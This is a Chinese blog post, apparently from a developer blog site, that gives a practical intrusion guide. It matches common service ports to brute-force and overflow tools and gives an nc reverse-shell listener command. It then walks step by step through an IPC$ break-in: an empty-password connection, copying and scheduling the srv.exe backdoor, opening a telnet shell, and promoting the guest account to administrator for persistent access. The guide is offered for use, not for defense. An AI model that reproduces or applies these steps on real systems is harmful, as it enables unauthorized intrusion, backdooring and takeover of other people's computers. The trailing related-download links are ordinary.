`
tolys
  • 浏览: 112459 次
  • 性别: Icon_minigender_1
  • 来自: 杭州
文章分类
社区版块
存档分类
最新评论

各个网络端口的入侵方法

阅读更多
 

1. 1433端口

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello溢出漏 洞入侵

nc -vv -l -p 本机端口 sqlhelloF.exe入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。

9. 3127等端口

 

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"

    这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\>copy srv.exe $">\\127.0.0.1\admin$

  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\>net time file://127.0.0.1/

     查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\>at file://127.0.0.1/ 11:05 srv.exe

        用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.

5. C:\>net time file://127.0.0.1/

     再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\>telnet 127.0.0.1 99

  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$

  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32>ntlm

  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

10. C:\>net user guest /active:yes

  将对方的Guest用户激活

11. C:\>net user guest 1234

  将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add

  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

分享到:
评论

相关推荐

    2023年内蒙古自治区中职网络安全赛题-B模块

    能学到什么:①通过各个地区的考题了解比赛的内容、②学习题目当中的考点,了解这题怎么做、③通过了解赛题对中职网络比赛有一定的基础知识。 阅读建议:不仅要学习题目当中的考点,应该举一反三,好好的琢磨题目的...

    基于PCAP的网络入侵检测系统C语言实现源码+详细项目说明+作业报告(课程大作业).zip

    本项目将实现一个基本的网络入侵检测系统, 涉及到对TCP/IP网络协议和线程的知识理解. 项目将使用`libpcap`库在特定的接口拦截 (嗅探) 数据包, 之后分析数据包. 项目的目标是检测高吞吐量网络中潜在的恶意流量. ## ...

    计算机网络安全文献综述.doc

    访问控制技术主 要包括入网访问控制、网络的权限控制、目录级安全控制、属性安全控制、网络服务器 安全控制、网络监测和锁定控制、网络端口和节点的安全控制。根据网络安全的等级、 网络空间的环境不同,可灵活地...

    网络安全设备培训教材(1).pptx

    网络安全设备:防火墙 4 (1)防火墙的概念 国家标准GB/T 20281-2006 《信息安全技术 防火墙技术要求和测试评价方法》给出的防火墙定义是: 设置在不同网络(如可信任的企业内部网络和不可信的公共网络)或网络安全...

    网络安全方案怎么写.doc

    在Internet出口处部署一台LinkTrust Network Defender领信网络入侵检测系统,通过交换机端口镜像的方式,将进出Internet的流量 镜像到入侵检测的监听端口,LinkTrust Network Defender可以实时监控网络中的异常流量...

    计算机网络安全防范措施.doc

    通过网络的IP端口地质转化和地址注册进行网络的防护是这一技术的主要特点, 如果同时访问内部网络与外部网络的话,对网络源地址以及端口进行自动的处理,主要 是通过改变网络源端口和地址与外界网络的连接实现对...

    企业计算机网络安全系统设计与实现.doc

    一些公司有网络端口扫描 。 在这种情况下,企业网络安全和网络安全管理已成为国内政府、学术界和行业关注的焦 点。 从政府的角度来看,企业网络具有重要的战略意义:企业网络是国家信息化基础设施 ,肩负着保护网络...

    计算机网络的安全对策.docx

    但随着计算机网络迅速的发展,计算机网络对全信息录入的要求以及各个领域对计算机网络的依赖,为人们的生活提供便利的同时,也潜藏着巨大的危机。主要体现在信息安全的问题上。很多不法分子对网络漏洞的利用,还有...

    计算机网络安全设计方案.doc

    在Internet出口处部署一台LinkTrust Network Defender领信网络入侵检测系统,通过交换机端口镜像的方式,将进出Internet的流量 镜像到入侵检测的监听端口,LinkTrust Network Defender可以实时监控网络中的异常流量...

    浅谈网络安全防护技术.doc

    防火墙技术作为一种访问控制,是在内外部网络之间建立一个保护层,使 外部网络对内部网络的访问受到一定的隔离,而内部网络成员仍能方便地访问外部网络 ,从而保护内部网络资源免受外部的非法入侵和干扰。 3 网络...

    防火墙技术对网络安全的影响(一).docx

    为了维护计算机网络的安全,人们提出了许多手段和方法,采用防火墙是其中最主要、最核心、最有效的手段之一。防火墙是网络安全政策的有机组成部分,它通过控制和监测网络之间的信息交换和访问行为来实施对网络安全的...

    易佳入侵防护(网站和服务器安全版) v2.01

    可以检测并阻止几乎所有的针对您服务器的扫描、端口探察以及底层和应用层攻击,从各个层面彻底保护您的Web,Email等服务器,完全抵御SYN DOS攻击,Sql注入攻击,Tcp全联接攻击等各种威胁,一旦察觉网络攻击,无论是...

    校园网网络安全设计方案(1).doc

    由于校园网网络特性(数据流量大,稳定性强,经济性和扩充性)和各个部门的要求 (制作部门和办公部门间的访问控制),我们采用下列方案: 1. 网络拓扑结构选择:网络采用星型拓扑结构(如图1)。它是目前使用最多,最为...

    对网络安全的认识.doc

    网络安全需求分析 对于各种各样的网络攻击,如何在提供灵活且高效的网络通讯及信息服务的同时,抵 御和发现网络攻击,并且提供跟踪攻击的手段,是保证安全需要解决的问题,网络基本安 全要求主要表现为:网络正常...

    网络安全问答题.doc

    答:〔1〕改变系统框架 〔2〕阻断攻击指向 〔3〕识别网络设备 〔4〕状态分组检验 〔5〕入侵检测系统〔IDS〕 〔6〕入侵防御系统〔IPS〕 〔7〕高层协议. 13.SSL产生会话密钥的方式是什么? 答:SSL采用公钥方式进行...

    校园网络安全建设与管理.docx

    15用户网络安全意识不强目前高校校园网络覆盖面很广,遍及校园的每个角落,住宅区、教学区及办公区等,端口不断增加,网络使用户群体迅速扩大,但是网络用户对于互联网的安全使用知识缺乏了解,存在着违规操作与误...

    网络安全知识的组成.docx

    早期的网络防护技术的出发点是首先划分出明确的网络边界,然后通过在网络边界处对流经的信息利用各种控制方法进行检查,只有符合规定的信息才可以通过网络边界,从而达到阻止对网络攻击、入侵的目的。目前广泛运用和...

    校园网络安全.doc

    由于学校数据吞吐量大,又离本部较远,所以学校采用一般的校 园双端口接入方式,用一条光纤连接到沈阳大学城市学院本部,另一条用百兆光纤作为福 清电信的局域网方式接入internet,实现网络高速运行。中心结构主要以...

    网络安全专项检查.doc

    " " " "入侵防范 "a)应在网络边界处监视以下攻击 " " " " "行为:端口扫描、强力攻击、木 " " " " "马后门攻击、拒绝服务攻击、缓 " " " " "冲区溢出攻击、IP碎片攻击和网 " " " " "络蠕虫攻击等; " " "12 " "b)当...

    网络安全防护相关技术保障措施.doc

    2、建立安全管理机构 (1)设立系统管理员、网络管理员、安全管理员等岗位,并定义各个工作岗位的职责; (2)配备一定数量的系统管理员、网络管理员、安全管理员; (3)根据各个部门和岗位职责明确授权审批部门及批准人,...

Global site tag (gtag.js) - Google Analytics